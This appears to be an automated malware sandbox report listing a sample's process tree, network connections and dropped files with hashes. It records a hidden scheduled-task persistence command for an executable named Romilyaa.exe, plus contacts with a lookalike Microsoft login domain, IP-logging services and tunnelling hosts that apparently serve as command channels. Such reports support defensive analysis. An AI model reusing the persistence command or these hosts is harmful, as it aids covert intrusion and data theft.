"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,839320844312324912,4757314447254224790,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NnbGeaeUTLT0.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6056 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6056 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=180 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pjCRu77GHrjM.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\xcopy.exe

xcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop

C:\Windows\SysWOW64\regedit.exe

regedit

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0Wc443H7jsH8.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 https-login--microsoftonline--com.httpsproxy.net udp
GB 142.250.200.19:80 https-login--microsoftonline--com.httpsproxy.net tcp
GB 142.250.200.19:80 https-login--microsoftonline--com.httpsproxy.net tcp
US 8.8.8.8:53 19.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 aadcdn.msauth.net udp
US 8.8.8.8:53 aadcdn.msftauth.net udp
US 13.107.253.65:443 aadcdn.msauth.net tcp
US 8.8.8.8:53 65.253.107.13.in-addr.arpa udp
US 13.107.253.65:443 aadcdn.msauth.net tcp
US 13.107.253.65:443 aadcdn.msauth.net tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 13.107.253.65:443 aadcdn.msauth.net tcp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 privacy.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 mrbeast.codes udp
US 8.8.8.8:53 dwrapper-prod.herokuapp.com udp
IE 46.137.15.86:80 dwrapper-prod.herokuapp.com tcp
US 8.8.8.8:53 86.15.137.46.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 jozzu420-51305.portmap.host udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 trustsentry.com udp
US 8.8.8.8:53 ya.ru udp
US 8.8.8.8:53 jozzu420-51305.portmap.host udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tria.ge udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 172.67.19.24:443 pastebin.com tcp
US 104.21.79.77:443 yip.su tcp
US 8.8.8.8:53 77.79.21.104.in-addr.arpa udp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 jozzu420-51305.portmap.host udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 216.58.204.67:443 gstatic.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 67.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 www.youtube.com udp
US 104.18.40.144:443 tria.ge tcp
GB 216.58.212.238:443 www.youtube.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 i.ytimg.com udp
GB 216.58.212.238:443 www.youtube.com udp
GB 142.250.179.246:443 i.ytimg.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 142.250.200.34:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 144.40.18.104.in-addr.arpa udp
US 8.8.8.8:53 238.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 246.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 34.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
US 8.8.8.8:53 static.doubleclick.net udp
GB 142.250.200.34:443 googleads.g.doubleclick.net udp
GB 216.58.201.106:443 jnn-pa.googleapis.com tcp
GB 142.250.179.230:443 static.doubleclick.net tcp
GB 216.58.201.106:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.178.14:443 play.google.com tcp
GB 142.250.178.14:443 play.google.com tcp
GB 142.250.178.14:443 play.google.com udp
US 8.8.8.8:53 106.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 230.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
US 172.67.188.178:443 iplogger.com tcp
US 8.8.8.8:53 having-jackson.gl.at.ply.gg udp
US 147.185.221.18:56522 having-jackson.gl.at.ply.gg tcp
US 8.8.8.8:53 178.188.67.172.in-addr.arpa udp
US 8.8.8.8:53 jozzu420-51305.portmap.host udp
US 8.8.8.8:53 jozzu420-51305.portmap.host udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 www.facebook.com udp
GB 216.58.212.238:443 www.youtube.com tcp
GB 163.70.151.35:443 www.facebook.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 173.194.69.84:443 accounts.google.com tcp
US 147.185.221.18:56522 having-jackson.gl.at.ply.gg tcp
US 8.8.8.8:53 consent.youtube.com udp
GB 142.250.187.238:443 consent.youtube.com tcp
NL 173.194.69.84:443 accounts.google.com udp
US 8.8.8.8:53 jozzu420-51305.portmap.host udp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 84.69.194.173.in-addr.arpa udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
GB 163.70.151.35:443 www.facebook.com udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
GB 163.70.151.21:443 static.xx.fbcdn.net tcp
GB 163.70.151.21:443 static.xx.fbcdn.net tcp
GB 163.70.151.21:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
GB 172.217.16.238:443 play.google.com udp
GB 172.217.16.238:443 play.google.com tcp
GB 172.217.16.238:443 play.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 163.70.151.21:443 static.xx.fbcdn.net udp
GB 142.250.179.228:443 www.google.com tcp
GB 172.217.16.238:443 play.google.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 228.179.250.142.in-addr.arpa udp
GB 142.250.179.228:443 www.google.com udp
US 8.8.8.8:53 video-lhr6-2.xx.fbcdn.net udp
US 8.8.8.8:53 video-lhr6-1.xx.fbcdn.net udp
GB 163.70.151.12:443 video-lhr6-2.xx.fbcdn.net tcp
GB 163.70.151.12:443 video-lhr6-2.xx.fbcdn.net tcp
GB 163.70.151.12:443 video-lhr6-2.xx.fbcdn.net tcp
GB 163.70.151.12:443 video-lhr6-2.xx.fbcdn.net tcp
GB 163.70.151.12:443 video-lhr6-2.xx.fbcdn.net tcp
GB 163.70.151.12:443 video-lhr6-2.xx.fbcdn.net tcp
US 8.8.8.8:53 video-lhr8-1.xx.fbcdn.net udp
US 8.8.8.8:53 video-lhr8-2.xx.fbcdn.net udp
GB 163.70.151.21:443 static.xx.fbcdn.net udp
GB 163.70.147.2:443 video-lhr6-1.xx.fbcdn.net tcp
GB 163.70.147.2:443 video-lhr6-1.xx.fbcdn.net tcp
GB 163.70.147.2:443 video-lhr6-1.xx.fbcdn.net tcp
GB 163.70.147.2:443 video-lhr6-1.xx.fbcdn.net tcp
GB 163.70.147.2:443 video-lhr6-1.xx.fbcdn.net tcp
GB 163.70.147.2:443 video-lhr6-1.xx.fbcdn.net tcp
GB 157.240.214.18:443 video-lhr8-2.xx.fbcdn.net tcp
GB 157.240.214.18:443 video-lhr8-2.xx.fbcdn.net tcp
GB 157.240.214.18:443 video-lhr8-2.xx.fbcdn.net tcp
GB 157.240.221.10:443 video-lhr8-1.xx.fbcdn.net tcp
GB 157.240.221.10:443 video-lhr8-1.xx.fbcdn.net tcp
GB 157.240.221.10:443 video-lhr8-1.xx.fbcdn.net tcp
US 8.8.8.8:53 scontent-lhr6-2.xx.fbcdn.net udp
GB 163.70.151.21:443 scontent-lhr6-2.xx.fbcdn.net tcp
GB 163.70.151.21:443 scontent-lhr6-2.xx.fbcdn.net tcp
GB 163.70.151.21:443 scontent-lhr6-2.xx.fbcdn.net tcp
US 8.8.8.8:53 scontent-lhr6-1.xx.fbcdn.net udp
GB 163.70.147.23:443 scontent-lhr6-1.xx.fbcdn.net tcp
US 8.8.8.8:53 12.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 2.147.70.163.in-addr.arpa udp
US 8.8.8.8:53 18.214.240.157.in-addr.arpa udp
US 8.8.8.8:53 10.221.240.157.in-addr.arpa udp
US 8.8.8.8:53 23.147.70.163.in-addr.arpa udp
US 8.8.8.8:53 scontent-lhr8-2.xx.fbcdn.net udp
US 8.8.8.8:53 scontent.xx.fbcdn.net udp
GB 157.240.214.11:443 scontent-lhr8-2.xx.fbcdn.net tcp
US 8.8.8.8:53 11.214.240.157.in-addr.arpa udp
US 8.8.8.8:53 jozzu420-51305.portmap.host udp
US 8.8.8.8:53 9.73.50.20.in-addr.arpa udp
US 8.8.8.8:53 jozzu420-51305.portmap.host udp
US 147.185.221.18:56522 having-jackson.gl.at.ply.gg tcp

Files

memory/1656-0-0x00000000747DE000-0x00000000747DF000-memory.dmp

memory/1656-1-0x0000000000EA0000-0x0000000000EFE000-memory.dmp

memory/1656-2-0x0000000005730000-0x0000000005754000-memory.dmp

memory/1656-3-0x00000000747D0000-0x0000000074F80000-memory.dmp

memory/1656-4-0x0000000005DD0000-0x0000000006374000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\!main.cmd

MD5 5bef4958caf537ac924b6ce01e1d1e13
SHA1 cf7a0805a98f3c16ca14c6e420e2ca44ad77a164
SHA256 e801541a9d48a9adbb720cdb5b06f9bab9b4a62f0434221876a607a7be75d28d
SHA512 9f62246e56f3461f8d180d3a4bc3ccd6187f457196b770af9c8427a3795504f6b44d2fb7a305d41d54d58e4759136426ca4f6e09771136f27d2c478aad153f99

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.pack

MD5 34a66c4ec94dbdc4f84b4e6768aebf4e
SHA1 d6f58b372433ad5e49a20c85466f9fb3627abff2
SHA256 fcf530e33a354ac1de143e2f87960e85f694e99d7aa652408c146e8d0a1430fb
SHA512 4db51769dcee999baf3048c793dde9ad86c76f09fc17edd8e2f1dedf91cf224ddfbe9554c4ff14659ea0f6663b054953ec2ab9d964e6e9ca44ee744e02b7e5b9

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\doxx.cmd

MD5 013a01835332a3433255e3f2dd8d37d6
SHA1 8a318cc4966eee5ebcb2c121eb4453161708f96c
SHA256 23923556f7794769015fb938687bf21c28ae5f562c4550c41d3d568ad608b99b
SHA512 12e9d439c8c558218d49415bbd27d0749f9f7a7e6c177074e11ac1a6f2185c22c4cf51f5a41133eaddf8a06288c352460d4450ad9702c4652ad259ed1260f42d

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\spread.cmd

MD5 7a71a7e1d8c6edf926a0437e49ae4319
SHA1 d9b7a4f0ed4c52c9fbe8e3970140b47f4be0b5f1
SHA256 e0d127c00f9679fb359c04b6238b976f1541918a0df0d6c61f1a44e8f27846ae
SHA512 96a57412bda3f16e56398cd146ece11e3d42291dceff2aec22871a7e35e3b102b27151984ae0795ca6d5ef5385ef780906d9b13cec78cbbdf019a3de4792ca3a

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\.didata

MD5 41b8ce23dd243d14beebc71771885c89
SHA1 051c6d0acda9716869fbc453e27230d2b36d9e8f
SHA256 bc86365a38e3c8472413f1656a28b04703d8c77cc50c0187ddf9d0afbb1f9bf7
SHA512 f0fb505c9f8d2699717641c3571acb83d394b0f8eee9cff80ad95060d1993f9f4d269c58eb35aae64a639054e42aaa699719b08357f7c0c057b407e2bdf775da

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\.edata

MD5 37c1a5c63717831863e018c0f51dabb7
SHA1 8aab4ebcf9c4a3faf3fc872d96709460d6bf6378
SHA256 d975b12871fc3f217b71bb314e5e9ea6340b66ece9e26a0c9cbd46de22368941
SHA512 4cf2b8efa3c4520cc80c4d560662bddbe4071b6908d29550d59bcda94c8b80a282b5e0b4536a88331a6a507e8410ccb35f4e38d0b571960f822bda7b69e4bb19

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\.idata

MD5 a73d686f1e8b9bb06ec767721135e397
SHA1 42030ea2f06f38d5495913b418e993992e512417
SHA256 a0936d30641746144eae91e37e8cbed42dc9b3ee3e5fdda8e45ad356180f0461
SHA512 58942400f6b909e42d36187fd19d64a56b92c2343ed06f6906291195fea6fe5a79fc628cbfc7c64e09f0196cbaba83dc376985ceef305bd0a2fadaca14b5c9e5

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\.txt

MD5 8f2f090acd9622c88a6a852e72f94e96
SHA1 735078338d2c5f1b3f162ce296611076a9ddcf02
SHA256 61da25d2beb88b55ef629fab530d506a37b56cfabfa95916c6c5091595d936e4
SHA512 b98fbb6d503267532d85bf0eb466e4e25169baefafdaaa97bdc44eaab2487419fde106626c0cc935ba59bcb4472597e23b3c21e3347ed32de53c185739735404

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\0.txt

MD5 c1672053cdc6d8bf43ee7ac76b4c5eee
SHA1 fc1031c30cc72a12c011298db8dc9d03e1d6f75c
SHA256 1cdb267b3e66becf183e9e747ae904e8684bab519041f39f9bd0b7dd0b3c66cb
SHA512 12e64a77c5b07d1f0fe1f07a6bf01078373d99bb7372a2d8a5c44fdbf753b44381f112822c1f75475e762d85fcf806487925860941005d342473ec90f9997633

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\CERTIFICATE.cer

MD5 c07164d3b38ca643290adaa325e1d842
SHA1 895841abf68668214e5c8aa0a1600ff6b88e299d
SHA256 da5dd4622c1c9054dc2c01cb36d26802ffbd3345e8cf8a20a2e8d7a859251600
SHA512 92922192fdca0b6a0a6634415fd0ccdd32087584b7b2ea0a1e550b8bf9a5c8fe79401fadc0de8d4d340ef700a01079b51529adcab576f0ca17a864748ae39118

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\data.txt

MD5 4c195d5591f6d61265df08a3733de3a2
SHA1 38d782fd98f596f5bf4963b930f946cf7fc96162
SHA256 94346a0e38b0c2ccd03cf9429d1c1bce2562c29110bb29a9b0befc6923618146
SHA512 10ee2e62ca1efa1cda51ca380a36dfabdd2e72cec41299369cac95fc3864ca5f4faa959f70d2b2c145430e591b1249f233b31bd78ba9ee64cf0604c887b674d7

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\_.txt

MD5 ad6e46e3a3acdb533eb6a077f6d065af
SHA1 595ad8ee618b5410e614c2425157fa1a449ec611
SHA256 b68ad9b352910f95e5496032eea7e00678c3b2f6b0923eb88a6975ef52daf459
SHA512 65d1f189e905419cc0569fd7f238af4f8ba726a4ddad156345892879627d2297b2a29213ac8440756efb1d7aaead1c0858462c4d039b0327af16cbb95840a1e8

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\i.txt

MD5 d40fc822339d01f2abcc5493ac101c94
SHA1 83d77b6dc9d041cc5db064da4cae1e287a80b9e6
SHA256 b28af33bc028474586bb62da7d4991ddd6f898df7719edb7b2dfce3d0ea1d8c6
SHA512 5701c2a68f989e56e7a38e13910421c8605bc7b58ae9b87c1d15375829e100bad4ac86186f9d5670c9a5e0dd3e46f097d1d276e62d878e0c2f6eb5f6db77dd46

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\2\CODE2000.TTF

MD5 052eaff1c80993c8f7dca4ff94bb83ca
SHA1 62a148210e0103b860b7c3257a18500dff86cb83
SHA256 afabc4e845085d6b4f72a9de672d752c002273b52221a10caf90d8cb03334f3c
SHA512 57209c40b55170da437ab1120b2f486d698084d7d572b14889b2184e8327010a94eee25a86c9e0156ba12ed1a680507016390f059f265cceb3aa8698e8e94764

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\2\readme.txt

MD5 d6b389a0317505945493b4bfc71c6d51
SHA1 a2027bc409269b90f4e33bb243adeb28f7e1e37b
SHA256 d94ed2f7aa948e79e643631e0cd73cf6a221790c05b50ad1d6220965d85ac67c
SHA512 4ea3c8bdee2b9e093d511a7e4ded557f182df8d96e798cb9ee95014f3b99ebd21f889516e5f934033b01b7ca1e26f5444f2e6be0cc0d7fba0b3faa4cea40e187

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\3\IMG_1598.MP4

MD5 808c2e1e12ddd159f91ed334725890f4
SHA1 96522421df4eb56c6d069a29fa4e1202c54eb4e4
SHA256 5588c6bf5b74c0a8b088787a536ef729bcedaedfc554ef317beea7fca3b392f7
SHA512 f6205b07c68f3b6abe7daf0517fbc07def4cb471bd754cd25333f5301dc9f1ac439217c6a09c875376ece4f6fb348e8b9e44e6e8a813ac5d8078cedc5b60bb3c

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\3\IMG_1599.MP4

MD5 06947b925a582d2180ed7be2ba196377
SHA1 34f35738fdf5c51fa28093ee06be4c12fcbd9fda
SHA256 b09bd14497d3926dc3717db9a3607c3cec161cc5b73c1af7e63d9ccce982a431
SHA512 27f6e3882db9f88834023ff3ece9f39cb041548e772af89d49c97fea7d7ceb4f2efdc019a89c0edf3308929a88fd488749fec97c63b836de136c437300b9ff73

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\3\IMG_1344.MP4

MD5 038725879c68a8ebe2eaa26879c65574
SHA1 34062adf5ac391effba12d2cfd9f349b56fd12dc
SHA256 eec8517fe10284368ed5c5b38b7998f573cc6a9d06ae535fe0057523819788be
SHA512 7b494cd77cb3f2aff8fd6aa68a9ba5cfc87fcaefa36b882e2f930bf82029526257c41a5205364cafc66f4c0f5d154cc1dfe44a6db06952075047975e2156e564

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\3\IMG_1689.MP4

MD5 1e5c2785bd0dd68ba46ddca622960eb5
SHA1 f99901491d60b748c470dca28f4f7d423eaa42e0
SHA256 1e199487c53b09a93d573ff9eee56aadb70de38ffa8d2d89001dca9ab8fdac96
SHA512 dbb768da8ddc14b5ffbda956258296a4f94cb49775c03cfe5f9e64e402938ec1c045685a14e44294cb31520c4c389d6c742f3f47e2acb46d0d9e96ec1ff4c58e

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\3\IMG_1741.MP4

MD5 5bf2d9277e2aaaf852d4b65d1e9bba67
SHA1 5d8876a9c641fc67b1f5fd23da079952fa879cfd
SHA256 3fbbdfbaa057533ad30787257bd31252fad8bfaaafabcd78473196d9b8fc6820
SHA512 848e43d7b0968b0e096e01078db51e029dc8014800a738fee43e39c7bf76ee616347424349a9a5a79af1af46c7f8c01501a6765746326f41a69791de5300523c

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\3\IMG_5049.MP4

MD5 1649d1b2b5b360ee5f22bb9e8b3cd54c
SHA1 ae18b6bf3bfa29b54fee35a321162d425179fc7e
SHA256 d1304d5a157d662764394ca6f89dcad493c747f800c0302bbd752bf61929044e
SHA512 c77b5bad117fda5913866be9df54505698f40ef78bf75dad8a077c33b13955222693e6bc5f4b5b153cfb54ff4d743403b1fd161270fa01ad47e18c2414c3d409

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\3\IMG_5068.MP4

MD5 91eb9128663e8d3943a556868456f787
SHA1 b046c52869c0ddcaec3de0cf04a0349dfa3bd9c3
SHA256 f5448c8e4f08fa58cb2425ab61705ade8d56a6947124dea957941e5f37356cd3
SHA512 c0d7196f852fc0434b2d111e3cf11c9fd2cb27485132b7ce22513fe3c87d5ad0767b8f35c36948556bce27dcc1b4aa21fbb21414637f13071d45f18c9ae32bf6

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\3\IMG_1870.MP4

MD5 092a111c6a159e3cb263fdaa9781c9d5
SHA1 fdeeb752db60e5e299e54b46c932908507dd2615
SHA256 54ca5ae616974ce576379652479c7b74817c6ed35ba150e5fa19ca92c995324c
SHA512 24a27b7c3b92607aa69aa2a329b1063278d48ef6d61baa6f3fa41ec50aa36968bc5897e0c2db22e1fc6b9e92a11365b796f2c47197b4c1187e953535fdd40982

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\3\IMG_5343.MP4

MD5 180722cbf398f04e781f85e0155fa197
SHA1 77183c68a012f869c1f15ba91d959d663f23232d
SHA256 94e998cedbbb024b3c7022492db05910e868bb0683d963236163c984aa88e02a
SHA512 bbece30927da877f7c103e0742466cda4b232fb69b2bf8ebe66a13bf625f5a66e131716b3a243bb5e25d89bd4bde0b004da8dd76200204c67a3d641e8087451d

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\61b13e8da79fd7d9f190f23f96c189db.dll

MD5 6ed35e30e6f986f74ef63999ea6a3033
SHA1 88af7462758ff24635f127b6d7ea6791ee89ab40
SHA256 b18d9f97d3f8a8f7fa295d9a81f6282630c687c9ba4066f6c40ed86a8502ccb2
SHA512 bcb0db406af39338e051285aa4dbadd421e7c2bd538714688c9fa52e70c69f38ab30cf97a62b10c4d2f3516e28e15fb63c2e4c455f894d4968dc4a2bb25b0dab

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\ac3.exe

MD5 7ecfc8cd7455dd9998f7dad88f2a8a9d
SHA1 1751d9389adb1e7187afa4938a3559e58739dce6
SHA256 2e67d5e7d96aec62a9dda4c0259167a44908af863c2b3af2a019723205abba9e
SHA512 cb05e82b17c0f7444d1259b661f0c1e6603d8a959da7475f35078a851d528c630366916c17a37db1a2490af66e5346309177c9e31921d09e7e795492868e678d

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\beastify.url

MD5 94c83d843db13275fab93fe177c42543
SHA1 4fc300dd7f3c3fb4bdcb1a2f07eea24936d843e5
SHA256 783a6de56d4538e4e2dfa0c1b4b69bdda1c119a559241807ddfdeece057f7b2e
SHA512 5259a5b9473e599fd5092d67710cb71caf432e397155fda136ded39bb0c03aa88c68e6e50ca3eba13ec6124c791a4d64c5fed701a46cdc651c2261ac8436b1fe

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bg.png

